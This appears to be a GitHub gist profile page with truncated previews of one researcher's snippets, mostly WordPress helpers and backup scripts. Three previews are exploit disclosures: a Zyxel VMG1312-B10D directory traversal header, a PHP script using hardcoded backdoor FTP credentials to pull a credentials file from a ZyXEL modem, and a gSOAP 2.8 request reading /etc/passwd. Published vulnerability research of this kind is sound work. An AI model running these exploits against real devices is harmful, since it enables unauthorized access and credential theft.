Skip to content

Instantly share code, notes, and snippets.

Avatar
🍪

numan türle numanturle

🍪
View GitHub Profile
View Search Block in Transient (30 Sec)
// Get user IP in WordPress
function get_the_user_ip() {
if ( ! empty( $_SERVER['HTTP_CLIENT_IP'] ) ) {
//check ip from share internet
$ip = $_SERVER['HTTP_CLIENT_IP'];
}else {
$ip = $_SERVER['REMOTE_ADDR'];
}
return apply_filters( 'wpb_get_ip', $ip );
}
@numanturle
numanturle / crawler_detect.php
Created May 21, 2018 — forked from geerlingguy/crawler_detect.php
Detect crawlers/bots/spiders in PHP (simple and fast)
View crawler_detect.php
<?php
/**
* Check if the given user agent string is one of a crawler, spider, or bot.
*
* @param string $user_agent
* A user agent string (e.g. Googlebot/2.1 (+http://www.google.com/bot.html))
*
* @return bool
* TRUE if the user agent is a bot, FALSE if not.
View yedek.sh
#!/bin/sh
BACKUP=/tmp/backup.$$
NOW=$(date +"%Y-%m-%d")
FTPD="/yedek"
FTPS="SUNUCU"
FTPU="USER"
FTPP="PASS"
FTPPO="PORT"
DBS="dbname dbname2 mysql"
[ ! -d $BACKUP ] && mkdir -p $BACKUP || :
@numanturle
numanturle / Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access
Last active Nov 17, 2018
Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access - Details
View Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access
# Exploit Title: Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access < 5.13(AAXA.8)C0
# Date: 2018-11-17
# Exploit Author: numan türle @numanturle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0
@modem_gateway = "192.168.1.1" // default address
View ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7)
<?php
$ftp_server = "192.168.1.1"; // modem ip address
$ftp_conn = ftp_connect($ftp_server) or die("ftp server close");
$login = ftp_login($ftp_conn, "support", "support"); // backdoor
$local_file = "crackme";
$server_file = "/var/csamu"; // base64_encode files
if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) {
$open = file($local_file);
@numanturle
numanturle / functions.php
Created Aug 30, 2019
wordpress thumbnail
View functions.php
<?php
add_action('add_attachment', 'rename_attachment');
function rename_attachment($post_ID){
$file = get_attached_file($post_ID);
$get_file_title = get_post($post_ID);
if($get_file_title->post_parent){
$post_santize_title = sanitize_title(get_the_title($get_file_title->post_parent));
$path = pathinfo($file);
$newfilename = $post_santize_title."-".$post_ID;
View gist:d7a89f13c70d0ffa9e9b30bb90ccc85f
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# encoding=utf8
import urllib.request
import urllib.error
import time
from multiprocessing import Pool
start = time.time()
View gSOAP 2.8 Directory Traversal
Request
############################
GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
You can’t perform that action at this time.